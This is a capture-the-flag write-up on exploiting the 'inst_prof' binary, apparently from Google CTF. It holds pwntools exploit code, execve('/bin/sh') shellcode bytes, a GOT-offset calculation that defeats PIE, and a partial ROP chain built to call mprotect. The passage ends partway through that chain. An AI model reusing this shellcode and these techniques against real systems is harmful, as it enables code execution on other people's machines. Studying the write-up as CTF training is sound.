6d = insd dword [rdi], dx
6e = outsb dx, byte [rsi]
6f = outsd dx, dword [rsi]
90 = nop
91 = xchg eax, ecx
92 = xchg eax, edx
93 = xchg eax, ebx
94 = xchg eax, esp
95 = xchg eax, ebp
96 = xchg eax, esi
97 = xchg eax, edi
98 = cwde
99 = cdq
9b = wait
9c = pushfq
9d = popfq
9e = sahf
9f = lahf
a4 = movsb byte [rdi], byte ptr [rsi]
a5 = movsd dword [rdi], dword ptr [rsi]
a6 = cmpsb byte [rsi], byte ptr [rdi]
a7 = cmpsd dword [rsi], dword ptr [rdi]
aa = stosb byte [rdi], al
ab = stosd dword [rdi], eax
ac = lodsb al, byte [rsi]
ad = lodsd eax, dword [rsi]
ae = scasb al, byte [rdi]
af = scasd eax, dword [rdi]
c3 = ret
c9 = leave
cb = retf
cc = int3
cf = iretd
d6 = salc
d7 = xlatb
ec = in al, dx
ed = in eax, dx
ee = out dx, al
ef = out dx, eax
f1 = int1
f4 = hlt
f5 = cmc
f8 = clc
f9 = stc
fa = cli
fb = sti
fc = cld
fd = std
-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(4) for x in range(256, 0x10000)]))' | while read i; do echo -n "$i = ";
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
<lots of assembly instructions redacted>
I was intent on compiling an exhaustive list of instructions we'd be allowed to use, but was running into some issues with the 3 byte instructions as there were 16777216 (256^3) potential encodings to evaluate.
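To see why the brute-force approach stops scaling, here is a small Python sketch that generates the same hex candidates the shell pipeline fed to rasm2 and counts how many exist per length. hex_candidates and candidate_count are hypothetical names, and nothing here actually invokes rasm2.

```python
from itertools import product

def hex_candidates(length: int):
    """Yield every possible byte string of `length` bytes as a hex string."""
    for combo in product(range(256), repeat=length):
        yield bytes(combo).hex()

def candidate_count(length: int) -> int:
    """Number of distinct byte strings of the given length."""
    return 256 ** length

one_byte = list(hex_candidates(1))
print(one_byte[0x50], one_byte[0xc3])  # encodings of push rax and ret

for n in (1, 2, 3, 4):
    print(n, candidate_count(n))
```

Each extra byte multiplies the search space by 256, so spawning one disassembler process per candidate becomes impractical at 3 bytes.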
Meanwhile I asked my friend if he could see whether any of the registers' states were saved in between the do_test loops.
It was then that I realized that sometimes it's not worth it to try solving a more general problem if you could just cut to the chase with some manual tests.
Revelation Registered
The breakthrough came when he discovered that the r15 and r14 registers were preserved across iterations of the do_test loop. I think he verified this using a simple sequence like this:
[0x7f2d4994a000]> pd 8
;-- map.unk2._rw_:
;-- rbx:
;-- rdi:
;-- rip:
0x7f2d4994a000 b900100000 mov ecx, 0x1000 ; rsi
.-> 0x7f2d4994a005 90 nop
| 0x7f2d4994a006 90 nop
| 0x7f2d4994a007 90 nop
| 0x7f2d4994a008 90 nop
| 0x7f2d4994a009 83e901 sub ecx, 1
`=< 0x7f2d4994a00c 75f7 jne 0x7f2d4994a005
0x7f2d4994a00e c3 ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
0x7ffc7df020c0
0x00000000
0x00000000
[0x7f2d4994a000]> dr r15=0xdeadbeef
0x00000000 ->0xdeadbeef
[0x7f2d4994a000]> dc
[0x7f2d4994a000]> pd 8
;-- map.unk2._rw_:
;-- rbx:
;-- rdi:
;-- rip:
0x7f2d4994a000 b900100000 mov ecx, 0x1000 ; rsi
.-> 0x7f2d4994a005 90 nop
| 0x7f2d4994a006 90 nop
| 0x7f2d4994a007 90 nop
| 0x7f2d4994a008 90 nop
| 0x7f2d4994a009 83e901 sub ecx, 1
`=< 0x7f2d4994a00c 75f7 jne 0x7f2d4994a005
0x7f2d4994a00e c3 ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
0x7ffc7df020c0
0x00000000
0xdeadbeef
dr can also directly set register values (in addition to displaying them) using the dr reg=... notation, as shown in the dr r15=0xdeadbeef command above.
At the dc command above, we had the STDIN of the binary attached to python so we could send it arbitrary bytes when the program used read() (0x90 * 4 in this case).
We can see that when setting the register value prior to continuing execution with dc, the register value (r15 in this case) is preserved after arriving at the loop section a second time.
I also verified that r13 was preserved using the same method. I then scrapped my instruction-enumeration approach and tried assembling some useful instructions to see how big they were:
-> % rasm2 -ax86.ks -b64 'mov r15, rsp'
4989e7
-> % rasm2 -ax86.ks -b64 'mov [r15], rsp'
498927
-> % rasm2 -ax86.ks -b64 'mov [r15+8], rsp'
49896708
-> % rasm2 -ax86.ks -b64 'pop r15'
415f
-> % rasm2 -ax86.ks -b64 'shl r15, 0x20'
49c1e720
-> % rasm2 -ax86.ks -b64 'sub rsp, 0x1000'
4881ec00100000
-> % rasm2 -ax86.ks -b64 'ret'
c3
We realized here that there were some (what we called) absolute instructions and some relative instructions: some instructions, like mov r15, rsp, give the same result no matter how many times they run and so were not affected by being executed 0x1000 times in the loop, while others, like shl r15, 0x20, would not survive being run multiple times in a loop.
This was tied to the instruction length being 3 or 4 bytes. Instructions that were 3 bytes in length could have a ret appended (one byte: c3) to escape the loop after a single pass, whereas instructions that were 4 bytes in length had to be run all 0x1000 times.
Instructions that were larger than 4 bytes (like the sub rsp, 0x1000 above) could not be run.
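These length rules can be captured in a small helper. The following is a Python sketch, not the code from our solution script; pad_instruction is a hypothetical name, and padding shorter instructions with nops after the ret is my own assumption (bytes after the ret are never reached).

```python
RET = b"\xc3"
NOP = b"\x90"
SLOT = 4  # read_inst always reads exactly 4 bytes

def pad_instruction(code: bytes) -> bytes:
    """Fit machine code into the 4-byte slot, escaping the loop if possible."""
    if len(code) > SLOT:
        raise ValueError("instruction does not fit in 4 bytes")
    if len(code) == SLOT:
        return code  # no room for a ret: runs all 0x1000 times
    # Append ret so the instruction runs once, then fill the rest with nops
    return (code + RET).ljust(SLOT, NOP)

print(pad_instruction(bytes.fromhex("4989e7")).hex())    # mov r15, rsp
print(pad_instruction(bytes.fromhex("415f")).hex())      # pop r15
print(pad_instruction(bytes.fromhex("49c1e720")).hex())  # shl r15, 0x20
```

The ret works as an early exit because the return address pushed by call rbx is still on top of the stack, so execution resumes in do_test after the first pass.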
While I was still learning more about different x86 instructions, my friend put together a simple write data primitive:
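# p is the connection to the challenge process (set up elsewhere in the script)
def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07'  # mov byte [r15], imm8 (the data byte is appended below)
    incCmd = '\x49\xff\xc7'    # inc r15
    ret = '\xc3'               # ret, so that inc r15 runs only once per send
    for b in byteString:
        p.send(writeCmd + b)   # 4 bytes: safe to repeat 0x1000 times
        p.send(incCmd + ret)   # 3 bytes + ret: escapes the loop after one pass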
This function would write data to the address stored in the r15 register, incrementing r15 after each written byte to keep the cursor position current.
At this point we were able to write data as long as the address in r15 was in a writable segment; however, we needed a game plan of what to write where (as well as how to get the right address into r15).
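For checking the payloads without a live connection, here is a Python 3 dry-run sketch of the same primitive. It only builds the 4-byte chunks that would be sent; write_payloads is a hypothetical name and the sample data is arbitrary.

```python
MOV_BYTE_R15 = bytes.fromhex("41c607")   # mov byte [r15], imm8 (imm8 appended)
INC_R15_RET = bytes.fromhex("49ffc7c3")  # inc r15 ; ret

def write_payloads(data: bytes) -> list:
    """Return the sequence of 4-byte chunks that writes `data` at [r15]."""
    chunks = []
    for value in data:
        chunks.append(MOV_BYTE_R15 + bytes([value]))  # store one byte
        chunks.append(INC_R15_RET)                    # advance the cursor once
    return chunks

for chunk in write_payloads(b"AB"):
    print(chunk.hex())
```

Every byte of data costs two round trips through do_test, which is worth keeping in mind given the 30 second alarm on the remote service.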
Plan A
The first plan I pitched was that of performing a ret2libc-type exploit where we simply called libc's system function with /bin/bash as the argument. In the past I'd done this by leaking a libc function address from the Global Offset Table, deducing which libc was being employed remotely, calculating the offset of system, and making a small ROP chain to jump to this function.
When we started down this road, it became apparent that there were some formidable obstacles in our way, mainly PIE and the requirement of leaking data. It was while we were brainstorming how to get around these that the realization that mprotect was being called set in. And so Plan B took form.
Plan B
Once we realized that mprotect was called by the make_page_executable function, we realized we could simply write some shellcode somewhere, make it executable, and then jump to it.
In theory.
We ruled out the page allocated by alloc_page since it was marked non-writable while it was being executed. We took a stab at trying to mark some of the stack as executable; however, we were unsuccessful (attributing the lack of success to some "unknown" feature of NX, whereas I'd learn later that we were specifying an unaligned address to mprotect).
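mprotect requires its addr argument to be a multiple of the page size and fails with EINVAL otherwise. A minimal Python sketch of the alignment we were missing is shown below; the helper names are hypothetical, the 4 KiB page size is an assumption, and the sample stack address is the read buffer address from the read_byte debugging session earlier.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

def is_page_aligned(addr: int) -> bool:
    """True if addr is acceptable as the first argument to mprotect."""
    return addr % PAGE_SIZE == 0

def page_align_down(addr: int) -> int:
    """Round an address down to the start of the page containing it."""
    return addr & ~(PAGE_SIZE - 1)

stack_addr = 0x7ffd632550af  # sample stack address from the earlier session
print(is_page_aligned(stack_addr))
print(hex(page_align_down(stack_addr)), is_page_aligned(page_align_down(stack_addr)))
```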
It was at this point that we called it a night and I went to bed dreaming of armored assembly.
The Next Day
After sleeping on it, I solidified the plan as follows:
1) Find writable region of memory
a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory
3) Set up call to `mprotect` through the `make_page_executable` call
a) Need to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode
Reflecting upon the previous day's work, I realized that I needed a region of memory that was always writable, and which would always be at a constant offset from the .text section.
I originally performed all of the following work on a writable section located just above (visually; lower memory address) the page allocated by alloc_page and got it working reliably on my local machine. However, after trying it remotely (against Google's challenge server), it became apparent that the section was not mapped at the same offset as on my local machine. Guessing at random addresses crossed my mind, but I dislike guessing when another solution can be found. It was then that I decided to refactor my solution to use the GOT as my target. The rest of this post explains the process I went through originally, but substituting the GOT section as my target rather than the failed one.
The Global Offset Table remained writable (due to only partial RELRO) and was mapped as part of the same binary image as the .text section, at a fixed offset from it.
And fortunately there was a reference to the .text section located at the top of the stack each time we entered the loop-executable section:
[0x562e80db3b16]> pd 2
;-- rip:
0x562e80db3b16 b ffd3 call rbx
0x562e80db3b18 0f31 rdtsc
[0x562e80db3b16]> ds; pd 8
;-- map.unk2._rw_:
;-- rbx:
;-- rdi:
0x7fa9a763e000 b900100000 mov ecx, 0x1000 ; rsi
.-> 0x7fa9a763e005 90 nop
| 0x7fa9a763e006 90 nop
| 0x7fa9a763e007 90 nop
| 0x7fa9a763e008 90 nop
| 0x7fa9a763e009 83e901 sub ecx, 1
`=< 0x7fa9a763e00c 75f7 jne 0x7fa9a763e005
0x7fa9a763e00e c3 ret
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8 0x0000562e80db3b18 .;...V..
Notice that the address of the instruction after call rbx (0x562e80db3b18, the rdtsc) is at the top of the stack once we are inside our loop-executable section.
This is in fact the return address within do_test pushed by the call rbx instruction. To check that this return address was at a constant offset from the Global Offset Table, I simply subtracted the return address from the GOT address, and re-ran the executable:
[0x7fa9a763e000]> iS~got
idx=22 vaddr=0x562e80fb4fd8 paddr=0x00001fd8 sz=40 vsz=40 perm=--rw- name=.got
idx=23 vaddr=0x562e80fb5000 paddr=0x00002000 sz=112 vsz=112 perm=--rw- name=.got.plt
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8 0x0000562e80db3b18 .;...V..
[0x7fa9a763e000]> ? section..got.plt - [rsp]
2102504 0x2014e8 010012350 2M 20000:04e8 2102504 "\xe8\x14 " 001000000001010011101000 2102504.0 2102504.000000f 2102504.000000
The iS command is the information on Sections command, which displays addresses of the different sections mapped by the process.
The ? command is used to perform math operations and returns the answer in a wide variety of formats.
The ~ character appended to any command will filter the output much like grep does.
I saw that the GOT address (the start of .got.plt) was exactly 0x2014e8 past the return address. Closing and re-opening the program did not change this. PIE did ensure that the text section's base address was randomized on each execution (save for the last 12 bits), but as long as I only used offsets relative to the text section address (provided as a return address from our looped section), PIE (and ASLR) wouldn't do much to mitigate my efforts.
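The relationship described above boils down to a single addition. As a minimal standalone sketch (plain Python 3, no pwntools; the constant and function names are hypothetical, and the offset only applies to this particular build of inst_prof), the GOT address can be recovered from the leaked return address like so:

```python
# Offset from the return address inside do_test to .got.plt,
# as measured with radare2 above. Specific to this binary.
GOT_PLT_OFFSET = 0x2014e8


def got_plt_from_return_address(ret_addr):
    """Hypothetical helper: derive the .got.plt address from the return address."""
    return ret_addr + GOT_PLT_OFFSET


# Return address taken from the r2 session above.
ret_addr = 0x562e80db3b18
got_plt = got_plt_from_return_address(ret_addr)
print(hex(got_plt))           # matches the .got.plt vaddr reported by iS

# Randomization happens at page granularity, so the low 12 bits stay put.
print(hex(ret_addr & 0xfff))
```

The same low 12 bits (0xb18) show up in every return address captured in this writeup, which is a quick sanity check that the right value is being read from the stack.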
Seeing from our earlier dm output above of the memory map that the GOT section was 8k in size, I knew I'd have plenty of space for both my shellcode and ROP chain.
And So ROP Begins...
The next challenge was how I'd get the address into the r15 register. I knew I could simply load the return address from the top of the stack using mov r15, [rsp], which was a 4 byte instruction. But then I'd need to add the offset 0x2014e8 to it to get our GOT address.
My first thought was to simply use the inc r15 instruction several (hundred) times, but even utilizing the 0x1000 loops, it would take 0x2014e8 / 0x1000 == 513 calls to the loop (plus another 0x4e8 single increments for the remainder) to increment it enough times. Instead, I used the loop count itself (0x1000, which rsi also held on entry) as a starting value and doubled it 9 times to build the offset in another placeholder register. This is where the exploit script started to take form, and here were the first few lines:
#!/usr/bin/env python2
from pwn import *
#open the process
p = process("./inst_prof")
#print program prompt
print(p.readline())
#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi
#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6\xc3") #add r14, r14
Note that for both add instructions the last byte is 0xc3, which is the ret instruction; this shortcuts the loop, letting the addition take place exactly 1 time.
To generate the assembled bytes for these instructions I used the rasm2 binary (which comes with radare2) with the keystone assembler: rasm2 -ax86.ks -b64 "add r14, r14". To install the keystone assembler, use r2pm init; r2pm update; r2pm -i keystone-lib; r2pm -i keystone from a terminal prompt.
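To make the ret trick concrete, here is a small standalone sketch (Python 3, stdlib only) that rebuilds the code page from the bytes shown in the earlier disassembly and drops a 3-byte instruction plus ret into the 4-byte slot. The helper names pad_to_slot and build_page are hypothetical, and the sketch only mirrors what r2 displayed; the way the program actually assembles the page may differ.

```python
MOV_ECX_0X1000 = b"\xb9\x00\x10\x00\x00"  # mov ecx, 0x1000
LOOP_TAIL = b"\x83\xe9\x01\x75\xf7\xc3"   # sub ecx, 1; jne <slot>; ret
RET = b"\xc3"
NOP = b"\x90"


def pad_to_slot(insn):
    """Hypothetical helper: make an instruction fill the 4-byte slot.

    Shorter instructions get a ret appended so they execute exactly once;
    any nop filler after the ret is never reached.
    """
    if len(insn) > 4:
        raise ValueError("instruction does not fit in the 4-byte slot")
    if len(insn) == 4:
        return insn  # no room for ret: this one runs on every loop iteration
    return (insn + RET).ljust(4, NOP)


def build_page(slot):
    """Rebuild the looped code page as it appeared in the disassembly."""
    if len(slot) != 4:
        raise ValueError("slot must be exactly 4 bytes")
    return MOV_ECX_0X1000 + slot + LOOP_TAIL


page = build_page(pad_to_slot(b"\x4d\x01\xf6"))  # add r14, r14
print(page.hex())
# The ret sits at offset 8, right after the add, so control returns to
# do_test before the sub/jne loop logic is ever reached.
print(page.index(RET))
```

A full 4-byte instruction such as mov r13, [rsp] leaves no room for the ret and therefore runs on every iteration, which is harmless only because repeating it gives the same result each time.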
It was here I decided to test the script. To do so I added the import from IPython import embed, and added embed() to the script. This allowed me to pause execution (at any place within the script) and attach the r2 debugger to the running process to inspect its state. I simply ran the script with ./solver.py, and after it dropped to the IPython shell, I switched to another terminal and attached to the process with r2:
-> % r2 -d 14198
[0x7f30b1ae4360]> dr r13; dr r14; dr r15
0x55ec37271b18
0x00200000
0x00000000
And lo and behold, I had my text section reference as well as the start of my offset calculation in r13 and r14 respectively.
To get the rest of the offset into the r14 register, I added a few more lines to the script to add 0x1000, then 0x246 twice, and finally increment 0x5c more times to get the desired value:
#add another 0x1000 to r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi
#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde\xc3") #add r14, r11
#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6\xc3") #inc r14
I'd noticed that every time we entered the loop section, the r11 register was set to 0x246 (most likely the RFLAGS value that the syscall instruction saves into r11), which I added twice to the offset in the add r14, r11 lines above.
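The arithmetic above is easy to get wrong by one step, so here is a standalone sketch (Python 3, no pwntools) that replays the register updates in plain integers and counts how many 4-byte sends they cost. The values of rsi and r11 are the ones observed in the debugger in this writeup; the variable names are only illustrative.

```python
TARGET = 0x2014e8  # return address -> GOT offset
RSI = 0x1000       # value observed in rsi on entry
R11 = 0x246        # value observed in r11 on entry

r14 = 0
sends = 0

r14 += RSI                 # add r14, rsi
sends += 1
for _ in range(9):         # add r14, r14, nine times: 0x1000 -> 0x200000
    r14 += r14
    sends += 1
r14 += RSI                 # add r14, rsi: 0x201000
sends += 1
for _ in range(2):         # add r14, r11, twice: 0x20148c
    r14 += R11
    sends += 1
for _ in range(0x5c):      # inc r14, 0x5c times: 0x2014e8
    r14 += 1
    sends += 1

# The inc-only alternative: looped incs for each full 0x1000,
# then single incs (with ret) for the remainder.
looped, single = divmod(TARGET, 0x1000)
naive_sends = looped + single

print(hex(r14), sends, naive_sends)
```

Under these assumptions the doubling approach needs 105 sends, against 1769 for the inc-only approach.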
At this point I should have both the text section address in r13, as well as the offset needed to reference the GOT in r14. To test, I added the following line to my script to add r14 to r13:
p.send("\x4d\x01\xf5\xc3") #add r13, r14
Then ran ./solver.py and attached with r2:
[0x7fb876853360]> dr r13; dr r14; dr r15
0x558b57e11000
0x002014e8
0x00000000
[0x7fb876853360]> ? section..got.plt
94056963182592 0x558b57e11000 02530552770210000 87597.4G b57e1000:0000 94056963182592 "\x10\xe1W\x8bU" 010101011000101101010111111000010001000000000000 94056963182592.0 94056965210112.000000f 94056963182592.000000
Success! I had successfully calculated the offset from the loop section's return address to the start of the GOT, and loaded the resulting GOT address into one of our scratch registers (r13).
Instead of writing shellcode all over the current GOT contents, I looked at the GOT section for an "empty" area:
[0x7fb876853360]> pxq @ section..got.plt
0x558b57e11000 0x0000000000201e08 0x00007fb876d3d0f0 .. ........v....
0x558b57e11010 0x00007fb876b2e5f0 0x00007fb8768533b0 ...v.....3.v....
0x558b57e11020 0x00007fb87685ca50 0x0000558b57c0f7d6 P..v.......W.U..
0x558b57e11030 0x00007fb876853350 0x00007fb876795420 P3.v.... Tyv....
0x558b57e11040 0x0000558b57c0f806 0x00007fb87685cb20 ...W.U.. ..v....
0x558b57e11050 0x00007fb87685cb50 0x0000558b57c0f836 P..v....6..W.U..
0x558b57e11060 0x0000558b57c0f846 0x0000558b57c0f856 F..W.U..V..W.U..
0x558b57e11070 0x0000000000000000 0x0000558b57e11078 ........x..W.U..
0x558b57e11080 0x0000000000000000 0x0000000000000000 ................
0x558b57e11090 0x0000000000000000 0x0000000000000000 ................
0x558b57e110a0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110b0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110c0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110d0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110e0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110f0 0x0000000000000000 0x0000000000000000 ................
I selected the address 0x558b57e110a0 (one of the all-zero rows in the dump above), which was 0xa0 past the GOT start. Since I'd learned that mprotect would only work on addresses that were multiples of 0x1000, I kept the GOT address in r13 for use in the ROP chain that I was planning to construct.
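The alignment requirement is the same one that tripped up the earlier attempt on the stack: mprotect rejects an address that is not a multiple of the page size. A minimal sketch of the check (Python 3; the helper names are hypothetical, and the page size of 0x1000 is assumed from the challenge environment):

```python
PAGE_SIZE = 0x1000


def is_page_aligned(addr, page_size=PAGE_SIZE):
    """True if addr is a multiple of the page size."""
    return addr % page_size == 0


def page_align_down(addr, page_size=PAGE_SIZE):
    """Round addr down to the start of the page that contains it."""
    return addr & ~(page_size - 1)


got_start = 0x558b57e11000        # GOT address from the dump above
second_stack = got_start + 0xa0   # where the exploit data will live
stack_top = 0x7ffd632550d8        # an rsp value seen earlier in r2

print(is_page_aligned(got_start))         # usable as an mprotect argument
print(is_page_aligned(second_stack))      # not usable directly
print(hex(page_align_down(second_stack)))
print(hex(page_align_down(stack_top)))
```

Because the GOT start happens to sit on a page boundary, passing it unchanged covers the page that also contains the data at +0xa0.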
Second Stack
Now that I had a reference to a writable region of memory, I set r15 to point 0xa0 past the GOT, where I'd place all my data for the exploit, including the shellcode and the ROP chain.
First I set r14 to 0xa0:
p.send("\x4d\x31\xf6" + ret) #xor r14, r14
for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14
It was here that I decided I wanted a way to easily distinguish the 3 and 4 byte instructions, so I refactored all the instructions with ret bytes to instead append a ret variable, where ret == "\xc3".
Then set r15 to r13 + r14:
#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13
#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14
Since my plan was to use r15 as the cursor into the second stack, I set r14 to this address:
p.send("\x4d\x89\xfe" + ret) #mov r14, r15
I was now ready to send my shellcode and inspect my second stack and registers, so that's what I did, adding the writeByteStr() function and directive to my solver script. This is what it looked like at that point:
#!/usr/bin/env python2
from pwn import *

ret = "\xc3"

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07' #mov byte [r15], {}
    incCmd = '\x49\xff\xc7' #inc r15
    for b in byteString:
        p.send(writeCmd + b)
        p.send(incCmd + ret)

#open the process
p = process("./inst_prof")
#print program prompt
print(p.readline())
#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi
#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6" + ret) #add r14, r14
#add another 0x1000 to r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi
#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde" + ret) #add r14, r11
#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6" + ret) #inc r14
p.send("\x4d\x01\xf5" + ret) #add r13, r14
p.send("\x4d\x31\xf6" + ret) #xor r14, r14
for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14
#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13
#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14
#save second stack pointer
p.send("\x4d\x89\xfe" + ret) #mov r14, r15
#write shellcode to second stack
writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68' + \
    '\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')
And I launched it so I could inspect with r2 to see if everything was in working order:
-> % r2 -d 5703
[0x7f5463e3c360]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x7f5463e3c360]> pxq 0x30 @ r14
0x558ef8c550a0 0x4850ec8948c03148 0x69622fffbb48e289 H1.H..PH..H../bi
0x558ef8c550b0 0x08ebc14868732f6e 0x89485250e7894853 n/shH...SH..PRH.
0x558ef8c550c0 0x3bb0e689485750e2 0x000000000000050f .PWH...;........
Excellent. We can see that r13 holds our GOT reference, while r14 points to the top of our second stack, and r15 points just past the last byte written (05 from my shellcode).
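The byte-by-byte write can be sketched on its own, without a live process. The following standalone Python 3 snippet (stdlib only; encode_write is a hypothetical stand-in for writeByteStr that returns the 4-byte chunks instead of sending them) shows what goes over the wire and why r15 ends up 0x2a past r14:

```python
WRITE_BYTE = b"\x41\xc6\x07"   # mov byte [r15], imm8 (imm8 is the 4th byte)
INC_R15 = b"\x49\xff\xc7\xc3"  # inc r15; ret

SHELLCODE = bytes.fromhex(
    "4831c0" "4889ec" "50" "4889e2"
    "48bbff2f62696e2f7368" "48c1eb08"
    "53" "4889e7" "50" "52" "4889e2"
    "50" "57" "4889e6" "b03b" "0f05"
)


def encode_write(data):
    """Return the sequence of 4-byte chunks that writes data at [r15]."""
    chunks = []
    for i in range(len(data)):
        # The store fills all 4 bytes, so it repeats on every loop iteration;
        # writing the same byte to the same place again changes nothing.
        chunks.append(WRITE_BYTE + data[i:i + 1])
        # The increment must happen once only, hence the trailing ret.
        chunks.append(INC_R15)
    return chunks


chunks = encode_write(SHELLCODE)
print(len(SHELLCODE), len(chunks))
print(hex(0x558ef8c550a0 + len(SHELLCODE)))  # expected r15 after the write
```

Each shellcode byte costs two sends, so the 42-byte payload takes 84 round trips through the loop.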
By this point I'd solved problems 1 and 2:
1) Find writable region of memory
a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory
And now had steps 3 and 4 left:
3) Set up call to `mprotect` through the `make_page_executable` call
a) Need to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode
To Call or Not to Call
Having looked at the call to make_page_executable from before, we saw that the first argument to mprotect is passed as an argument to make_page_executable in the rdi register. Therefore I needed to find a pop rdi gadget that I'd call prior to calling make_page_executable in the ROP chain.
Fortunately, r2 has a handy ROP search tool:
[0x7f5464323000]> s main
[0x558ef8a53860]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x558ef8a53860]> /R/ pop rdi
0x558ef8a53bc3 5f pop rdi
0x558ef8a53bc4 c3 ret
[0x558ef8a53860]> pxq 8 @ rsp
0x7ffcaacd0eb8 0x0000558ef8a53b18 .;...U..
[0x558ef8a53860]> ? 0x558ef8a53bc3 - [rsp]
171 0xab 0253 171 0000:00ab 171 "\xab" 10101011 171.0 171.000000f 171.000000
/R/ allows searching for ROP gadgets using a regular expression.
With the /R/ pop rdi command above, I use the gadget search tool to find a pop rdi gadget, and then calculate its offset from the return address in [rsp], showing that the gadget is 0xab past the return address.
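For readers without r2 at hand, the idea behind the gadget search can be approximated with a plain byte search for 5f c3 (pop rdi; ret). The sketch below is standalone Python 3 with a hypothetical find_all helper. The sample bytes are illustrative only (pop r14; pop r15; ret, a sequence in which a pop rdi gadget commonly hides); I have not confirmed that this is what surrounds the gadget in inst_prof.

```python
POP_RDI_RET = b"\x5f\xc3"  # pop rdi; ret


def find_all(blob, needle):
    """Return every offset at which needle occurs in blob."""
    offsets = []
    start = blob.find(needle)
    while start != -1:
        offsets.append(start)
        start = blob.find(needle, start + 1)
    return offsets


# Illustrative bytes: 41 5e = pop r14, 41 5f = pop r15, c3 = ret.
# Skipping the 0x41 prefix of the second pop yields pop rdi; ret.
sample = b"\x41\x5e\x41\x5f\xc3"
hits = find_all(sample, POP_RDI_RET)
print(hits)

# Turning the measured offset into an address for a given run:
ret_addr = 0x558ef8a53b18
pop_rdi = ret_addr + 0xab
print(hex(pop_rdi))
```

A raw byte search will also report matches that fall inside data or immediates, which is one reason a disassembling search like r2's /R/ is the more convenient tool.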
At this point I needed an additional qword of scratch space to work with, so I moved my shellcode 8 bytes further along, leaving r14 pointing to a spare qword on my second stack, to which I wrote the GOT address. With this code change, the state of my registers and second stack went from:
r13 == GOT address
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == shellcode
To:
r13 == scratch
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == GOT address
[r14+8] == shellcode
Or to illustrate with radare, it went from:
[0x558ef8a53860]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x558ef8a53860]> pxq 0x40 @ r14
0x558ef8c550a0 0x4850ec8948c03148 0x69622fffbb48e289 H1.H..PH..H../bi
0x558ef8c550b0 0x08ebc14868732f6e 0x89485250e7894853 n/shH...SH..PRH.
0x558ef8c550c0 0x3bb0e689485750e2 0x000000000000050f .PWH...;........
0x558ef8c550d0 0x0000000000000000 0x0000000000000000 ................
To:
[0x55eefe549b16]> dr r13; dr r14; dr r15
0x55eefe74b000
0x55eefe74b0a0
0x55eefe74b0d2
[0x55eefe549b16]> pxq 0x40 @ r14
0x55eefe74b0a0 0x000055eefe74b000 0x4850ec8948c03148 ..t..U..H1.H..PH
0x55eefe74b0b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH...
0x55eefe74b0c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...;
0x55eefe74b0d0 0x000000000000050f 0x0000000000000000 ................
Now that the GOT address was saved at [r14], this freed up r13 to do some more offset calculation needed for the pop rdi gadget I found.
I simply needed [rsp] + 0xab to start my ROP chain, which I accomplished via:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xab):
    p.send("\x49\xff\xc5" + ret) #inc r13
#save pop addr on rop stack:
p.send("\x4d\x89\x2f" + ret) #mov [r15], r13
r15 now points to the start of our ROP chain, whose first entry is the pop rdi gadget's address. Since ROP depends fully on the state of the rsp register (and the memory region it points to), we have to make sure that the pop rdi gadget will pop the correct value into rdi, which needs to be the argument we want to supply to make_page_executable, namely the page-aligned address of the GOT we want to mark as executable.
So I load this from our previously saved location at [r14] into r13, and write that to our second stack cursor plus 8:
p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
p.send("\x4d\x89\x6f\x08") #mov [r15+8], r13
At this point, our second stack looks like this (logically):
+------------------------+ ;r14
| GOT address |
+------------------------+
| |
| Shellcode |
| |
